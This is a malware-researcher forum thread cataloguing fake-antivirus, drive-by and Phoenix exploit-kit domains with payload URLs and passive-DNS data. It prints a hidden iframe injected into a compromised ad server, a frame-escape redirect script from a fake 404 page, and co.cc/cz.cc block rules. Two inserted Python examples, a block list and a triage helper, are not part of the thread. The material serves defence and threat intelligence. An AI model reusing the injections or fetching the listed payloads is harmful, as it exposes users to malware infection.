Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on June 18, 2010, 04:30:09 pm
-
This thread is for the one-offs we find.
Fake Scanner Pages:
www2.routesave19.co.cc
www2.netguard37-pd.co.cc
http://www2.routesave19.co.cc/Images/loading.gif
http://www2.routesave19.co.cc/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
-
FakeAV infected clients POST'ing to:
wellsellit.com
http://wellsellit.com/borders.php
-
Exploited clients posting to:
lolopingtroll.org/stats/gate.php?id=84fefcb9
and pulling from:
pulselocums.com.au/media/sound.exe
VirusTotal says it's ZeuS:
http://www.virustotal.com/analisis/191d6ac238d6684a385380826bcf34f2698632c2ca9fbc57f4143b0310ea5cc0-1277240374
-
Fake Scanners:
www1.softscaner35.co.cc
www1.softscaner36.co.cc
www2.newbless6.co.cc
www1.softscaner34.co.cc
All have the following URL accessible:
/Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg
-
More fake scanner pages:
http://www1.trytocleanit-45p.co.cc
http://www1.avsolution31pr.co.cc
http://www2.lordofsave9.co.cc
http://www2.lordofsave4.co.cc
-
Fake Scanners:
www1.glory4.co.cc
www1.glory3.co.cc
-
Fake Scanner Pages:
www1.oksave9.co.cc
Redirectors to Fake Scanner Pages:
www3.avsolution42.co.cc
-
FakeAV page:
http://antivirglass.com/purchase?pgid=2&r=57.5
-
FakeAV:
http://business.one.strangled.net/3/?c=917
Redirects to FakeAV:
http://pivfeels.com/mytds/go.php?s=17
-
Phoenix Exploit kit:
http://decorum76.info/e9t/
More domains on same IP with exploit kits:
decoy56.info/e9t/
extraditelbds.info/e9t/
erratic335.info/e9t/
magnatevhl8.info/q8s/
bristlejfgj8.info/e9t/
inclination19y.info/x0c/
-
Drive-bys with very low detection rates (1/41):
http://domger.in/d/
VirusTotal Payload Results:
http://www.virustotal.com/analisis/1f75ef5ae8b8c0a8cc13242cd22a75c0e45f443b9a6fe8906287b9c1e6bbb3bb-1279005248
-
Phoenix drive by kits:
http://whetcb67.info/n21/ - drive by
http://fglq.info/n2l/l.php?i=3 - payload
-
http://333.gorgrengos.com/b/index.php - driveby
-
Drive by:
www.hezhexh.co.cc/x33/
Seeing hacked forums redirect to this (via rpzrtru.co.cc/tds/in.cgi?default). Example of hacked forum link that leads to this drive by:
http://www.bicycles.net.au/forums/viewtopic.php?f=9&t=31289&start=25
-
The Openx adserver has been compromised.
http://www.bicycles.net.au/adserver/www/delivery/spc.php?zones=1|2|3
var OA_output = new Array();
OA_output['1'] = '';
OA_output['2'] = '';
OA_output['3'] = '';
OA_output['3'] += "<"+"a href=\'http://www.bicycles.net.au/adserver/www/delivery/ck.php?oaparams=2__bannerid=20__zoneid=3__cb=82c8d8ab02__oadest=http%3A%2F%2Fwww.cyclechallenge.com%2FThe-Event-1%2FInternational-Riders%2FWin-a-trip-to-Cycle-Challenge%2Fdefault.aspx\' target=\'_blank\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/images/b9e4c50eff89401296bf4b6e66125934.gif\' width=\'120\' height=\'80\' alt=\'Competition: Contact Lake Taupo Cycle Challenge\' title=\'Competition: Contact Lake Taupo Cycle Challenge\' border=\'0\' /><"+"/a><"+"div id=\'beacon_82c8d8ab02\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.bicycles.net.au/adserver/www/delivery/lg.php?bannerid=20&campaignid=8&zoneid=3&cb=82c8d8ab02\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"iframe src=\"http://rpzrtru.co.cc/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>\n";
-
borat-carrer.com/img/index.php - Phoenix Exploit Kit
-
trade-yourauto.info/s/index.php - Phoenix Exploit Kit
trade-yourauto.info/s/tmp/des.jar - Java Exploit
-
jazzstibbtm.com/aa/index.php - phoenix exploit kit
79.135.152.222/a/index.php - phoenix exploit kit
brittnom.com/038512946/news.php - phoenix exploit kit
http://193.169.235.225/?q=Z5249FKA1J61R99H14NWY1W0J6VOWW67ZECX0K1Y8N4DO010Y52DNG9D847NNN4TV4VL0Y9V79UU09XWZW8D9ZE50K0XEJISRkiJU06WW47XUUpVmsnMyVaMkk2Qj8iMitKBmlybWoCfB9uCGANdzMBTQElAU50d3BfdlkMACh%252BegVkbw1veFZgW28CXWFmVl09Nj9nATgIaH0GCH0GAQcGTSM4NQ%253D%253D - Fake Scanner Page
http://193.169.235.225/?q=asdf - payload (can be anything after the q= really)
-
http://h26heh1.co.cc/x6dmrk2/ - drive by
jsunpack results:
http://jsunpack.jeek.org/dec/go?report=8f812b03d3390d1476b1c4f112e62cd4c8496ae2
-
http://stepanola.in:8080/axb/ - drive by (eleonore IIRC)
-
Phoenix Exploit Kit:
68.68.20.113 - fun.anexelymoweq.in
Redirector (second stage):
78.46.75.144 - verystrangeone.com/in.cgi?13
Redirector (first stage):
174.137.146.174 - 174.137.146.174/?cbb=27867330230596
-
Seeing this one being redirected to by hacked Drupal websites:
Phoenix Exploit Kit:
62.122.73.51 - http://besimorr.com/images/start.php?id=vlnd
Other hostnames via passive DNS:
cubbypa.com A 62.122.73.51
ns1.cubbypa.com A 62.122.73.51
ns2.cubbypa.com A 62.122.73.51
chinapinkpig.com A 62.122.73.51
ns1.chinapinkpig.com A 62.122.73.51
ns2.chinapinkpig.com A 62.122.73.51
boxberil.com A 62.122.73.51
ns1.boxberil.com A 62.122.73.51
ns2.boxberil.com A 62.122.73.51
disreco.com A 62.122.73.51
ns1.disreco.com A 62.122.73.51
ns2.disreco.com A 62.122.73.51
besimorr.com A 62.122.73.51
ns1.besimorr.com A 62.122.73.51
ns2.besimorr.com A 62.122.73.51
delilit.com A 62.122.73.51
ns1.delilit.com A 62.122.73.51
ns2.delilit.com A 62.122.73.51
ns1.youtubesxx.com A 62.122.73.51
ns2.youtubesxx.com A 62.122.73.51
62.122.73.52 seems to be bound to the same host as well:
boxberil.com A 62.122.73.52
shoughbo.com A 62.122.73.52
ns1.shoughbo.com A 62.122.73.52
ns2.shoughbo.com A 62.122.73.52
delilit.com A 62.122.73.52
youtubesxx.com A 62.122.73.52
heh:
/home/shayai/public_html/index.php
I <3 php error reporting
-
Another phoenix kit having traffic driven to it from exploited domains:
http://boxberil.com/images/start.php?id=vlnd
-
More phoenix:
91.193.192.90 - http://7tokk.cz.cc/vo/ithsaoj.php
Uses SEO poisoning to drive users to it.
-
A while back I configured DNS to not resolve any co.cc or cz.cc domains at all. I have not had any business impact after doing this, and this is for a Fortune 500 company. I recommend you do the same.
-Seedler
-
I blocked co.cc and cz.cc domains on proxy servers of a large company and haven't had any business impact. I can recommend that too.
-
We do that as well for an 80k+ user network. I also wrote the Snort sigs that look for these domains in HTTP requests and alert on them as suspicious through the EmergingThreats snort users group ;)
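The co.cc / cz.cc block the replies above describe, as an added example (not code from the thread or from any poster): the resolver refuses to answer for anything under those registrar-style parents, and the same rule is applied to the Host header of outbound HTTP requests, which is where a proxy or IDS would see it. Matching is done on whole DNS labels so that look-alikes such as evilco.cc or co.cc.intranet.example are not caught. The BLOCKED_PARENTS set, the function names and the sample requests are assumptions for the example; two of the sample hostnames are ones posted in this thread.

```python
"""Added example: enforce a co.cc / cz.cc block list the way the replies above
describe (DNS refusing to resolve, proxy refusing to fetch) and flag such hosts
in HTTP requests. Not code from the thread; names and samples are assumptions."""
import re

# Registrar-style parents the posters block outright (constructed policy set).
BLOCKED_PARENTS = frozenset({"co.cc", "cz.cc"})


def is_blocked_host(host: str) -> bool:
    """True when host is one of the blocked parents or any subdomain of one.

    Matching is on whole DNS labels, so 'evilco.cc' (label 'evilco') is not
    caught and neither is 'co.cc.intranet.example' (co.cc is not a suffix there).
    Case, a trailing dot and a ':port' suffix are normalised away first.
    """
    h = host.strip().lower().rstrip(".").split(":", 1)[0]
    if not h:
        return False
    labels = h.split(".")
    # Walk every suffix: www1.glory4.co.cc -> glory4.co.cc -> co.cc -> cc
    return any(".".join(labels[i:]) in BLOCKED_PARENTS for i in range(len(labels)))


def resolver_policy(qname: str) -> str:
    """What a policy-aware resolver does with a query name.

    Returns 'NXDOMAIN' for blocked names (the 'do not resolve' behaviour
    described above) and 'FORWARD' for everything else.
    """
    return "NXDOMAIN" if is_blocked_host(qname) else "FORWARD"


# Host header of a raw HTTP/1.x request; \S+ stops at the CR of the CRLF.
HOST_HEADER = re.compile(r"^Host:[ \t]*(\S+)", re.IGNORECASE | re.MULTILINE)


def flagged_hosts(raw_requests):
    """Return the Host header values, lowercased, of requests that hit the policy.

    This is the proxy / IDS side of the same rule: inspect the Host header of
    each outbound request instead of the DNS query.
    """
    hits = []
    for req in raw_requests:
        m = HOST_HEADER.search(req)
        if m and is_blocked_host(m.group(1)):
            hits.append(m.group(1).lower().rstrip("."))
    return hits


# Constructed sample requests. Two use hostnames posted in this thread, one
# is a benign control, one is a look-alike that must not be blocked.
SAMPLE_REQUESTS = [
    "GET /Layouts/Landings/CentralLandings/7/images/list/main_sprite.jpg HTTP/1.1\r\n"
    "Host: www1.glory4.co.cc\r\nUser-Agent: Mozilla/4.0\r\n\r\n",
    "GET /vo/ithsaoj.php HTTP/1.1\r\nHost: 7tokk.cz.cc\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: co.cc.intranet.example\r\n\r\n",
]

if __name__ == "__main__":
    for h in ("www1.glory4.co.cc", "7tokk.cz.cc", "evilco.cc", "example.com"):
        print(f"{h:28} -> {resolver_policy(h)}")
    print("flagged:", flagged_hosts(SAMPLE_REQUESTS))
```

The suffix walk is what makes this safe to deploy broadly: it blocks exactly the names under co.cc and cz.cc, never a legitimate .cc domain whose last label happens to end in "co".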
-
More Phoenix:
thruleni.com/images/start.php?id=wag5 - 62.122.73.53
IP is already in the MDL with another hostname but is listed as "fake av".
-
Phoenix Kits:
advancedwebanalytic.com/stats/fnktcnfza3.php
zlenbigret.com/03oofm059mw.php?s=IBCCL
-
More phoenix:
web-statistics-css.ru/n3/xndobob.php
Anyone going to bible.com is getting redirected to this currently.
-
More Phoenix:
www.zanupoits.com
http://www.zanupoits.com/722quoct6k.php?s=IBCCM
Looks to be fluxing.
-
174.127.87.104 - various host names
This is redirecting to lots of fake scanner pages like freeantiagencyxp.com. Definitely needs to be listed. Doing some more intel on this now....
GET /?s=18 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-e
xcel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-
flash, */*
Referer: http://getmediacontent.com/145/40brands/banner.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET C
LR 2.0.50727)
Host: 30kuil1.iodelivery.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 13:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 861
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=uft8">
<title>404 Not Found</title>
<script>
if (window.top != window.parent.parent) window.top.location.href="http://xpscanan
tiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2
K";
</script>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL /index.html was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
</p>
<hr>
<address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Port 80</address>
</body>
</html>
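An added triage helper for responses like the capture above (example code, not from the thread): it splits a raw HTTP response into status, headers and body, pulls any URL a script forces onto the top window, and flags the tells visible in this capture: a 200 status carrying a "404 Not Found" body, a Server header (Apache/2.2.3) that disagrees with the Apache banner in the <address> footer (Apache/2.0.63), and a top-frame redirect to a host other than the one that served the page. The sample response is constructed from the capture above with the wrapped lines rejoined and a few headers dropped; the function names and the benign control response are assumptions.

```python
"""Added triage helper for a captured HTTP response (not code from the thread)."""
import re
from urllib.parse import urlparse

# Constructed sample modelled on the capture above: the wrapped lines are
# rejoined and only the headers the checks need are kept.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 24 Mar 2011 13:53:28 GMT\r\n"
    "Server: Apache/2.2.3 (CentOS)\r\n"
    "X-Powered-By: PHP/5.1.6\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head><title>404 Not Found</title>\n"
    "<script>\n"
    "if (window.top != window.parent.parent) window.top.location.href="
    '"http://xpscanantiviruscentral.com/index2.php?06abQDU9QUDBV2v7rCw7i8WveTo6MHVmLVpZeCOrV1lTN5AlQy2K";\n'
    "</script>\n</head><body><h1>Not Found</h1>\n"
    "<address>Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 Port 80</address>\n"
    "</body></html>\n"
)

# Constructed benign control: a real 404 with matching banners and no script.
BENIGN_404 = (
    "HTTP/1.1 404 Not Found\r\nServer: Apache/2.2.3 (CentOS)\r\n\r\n"
    "<html><head><title>404 Not Found</title></head><body>"
    "<address>Apache/2.2.3 (CentOS) Port 80</address></body></html>"
)

# Script assignment that replaces the top-level document, as in the capture.
TOP_REDIRECT = re.compile(
    r"window\.top\.location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
# Apache banner in the default ErrorDocument footer.
ADDRESS_BANNER = re.compile(r"<address>\s*(Apache/[0-9.]+)", re.IGNORECASE)


def split_response(raw: str):
    """Split a raw response into (status line, lowercased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def frame_escape_targets(body: str, served_host: str):
    """URLs a script in the body forces onto the top window, excluding same-host."""
    targets = []
    for url in TOP_REDIRECT.findall(body):
        host = urlparse(url).hostname
        if host and host.lower() != served_host.lower():
            targets.append(url)
    return targets


def triage(raw: str, served_host: str):
    """Return (findings, redirect targets) for one captured response.

    served_host is the Host header of the request that produced the response.
    """
    status, headers, body = split_response(raw)
    findings = []
    targets = frame_escape_targets(body, served_host)
    if targets:
        findings.append("top_frame_redirect_offsite")
    # A 200 whose body is the stock 404 page is content dressed up as an error.
    if " 200 " in status and re.search(r"<title>\s*404", body, re.IGNORECASE):
        findings.append("status_200_but_404_body")
    # The Server header and the footer banner should name the same build.
    m = ADDRESS_BANNER.search(body)
    server = headers.get("server", "")
    if m and server and not server.startswith(m.group(1)):
        findings.append("server_header_vs_footer_mismatch")
    return findings, targets


if __name__ == "__main__":
    print(triage(SAMPLE_RESPONSE, "30kuil1.iodelivery.com"))
    print(triage(BENIGN_404, "www.example.com"))
```

The frame check is the important one: a page that only redirects when it is not the expected frame is behaving like the ad-delivered landing in this capture, and the off-site target is the indicator worth listing.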